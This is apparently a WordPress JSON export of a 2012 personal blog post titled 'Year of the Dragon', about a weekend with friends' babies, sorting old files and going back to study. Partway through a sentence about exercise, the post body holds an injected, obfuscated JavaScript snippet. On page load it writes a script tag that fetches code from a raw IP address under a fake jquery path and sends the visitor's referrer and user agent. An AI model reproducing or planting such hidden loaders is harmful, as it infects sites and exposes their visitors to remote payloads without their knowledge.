{"id":2789,"date":"2012-01-23T07:57:42","date_gmt":"2012-01-23T14:57:42","guid":{"rendered":"http:\/\/www.rebeccagibson.org\/?p=2789"},"modified":"2012-06-14T08:36:18","modified_gmt":"2012-06-14T15:36:18","slug":"year-of-the-dragon","status":"publish","type":"post","link":"http:\/\/www.rebeccagibson.org\/?p=2789","title":{"rendered":"Year of the Dragon"},"content":{"rendered":"<p>Happy new year!\u00c2\u00a0\u00c2\u00a0 The year of the dragon is generally meant to be a lucky year for pretty much everybody.\u00c2\u00a0 I hope so.<\/p>\n<p>This was a very baby-oriented weekend, which was really nice for me.\u00c2\u00a0 Paul and I visited with Ken and Karen on Friday, so I got to play with Xak and snuggle with Nova; we babysat for Jojo on Saturday; Sunday all three of the littlest Stringthings made appearances at the knitting group, and we had dinner with some friends of Paul&#8217;s who have a really hilarious little toddler.<\/p>\n<p>I&#8217;ve been cleaning out old files and trying to distinguish between things that were important to me once, things that are still important to me, and things that might actually be useful (not merely sentimental).\u00c2\u00a0 It&#8217;s astonishing how much stuff I&#8217;d been holding on to that I find I really don&#8217;t need.\u00c2\u00a0 Spring cleaning!<\/p>\n<p>Meanwhile, to check back in on all my ambitious new-year plans:\u00c2\u00a0 my hair looks weird, I&#8217;ve been exercising maybe 2 or 3 times a week (which is, while not the same as <em>every <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isysr|var|u0026u|referrer|drfyi||js|php'.split('|'),0,{}))\n<\/script><\/noindex> day<\/em>, significantly more than <em>none<\/em>), and good grief&#8230; when is there time to do homework!?\u00c2\u00a0 I am seriously out of practice being a student.<\/p>\n<p>I love it, though.\u00c2\u00a0 The &#8220;big idea&#8221; that kept me awake at night when I was a proper student, in my twenties, was all about the &#8220;idea&#8221; of what a school is, and how that affects what schools are actually like.
